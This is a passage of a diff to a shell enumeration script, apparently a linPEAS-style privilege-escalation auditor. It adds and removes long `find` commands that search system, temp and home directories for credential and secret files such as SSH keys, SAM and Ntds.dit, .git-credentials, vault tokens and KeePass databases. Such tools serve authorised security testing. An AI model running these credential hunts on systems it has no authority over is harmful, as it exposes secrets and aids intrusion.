-name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o 
-name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name 
\"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find /sys -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"agent*\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name 
\"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"sess_*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o 
-name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"ssh*config\" -o -name \"config.php\" -o -name \"*.kdbx\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o 
-name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name 
\"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name 
\".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"sess_*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name 
\"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - #MacOS Directories - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /Applications -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - # All - FIND_HOME=`eval_bckgrd "find $HOMESEARCH $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_KNOCK_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 
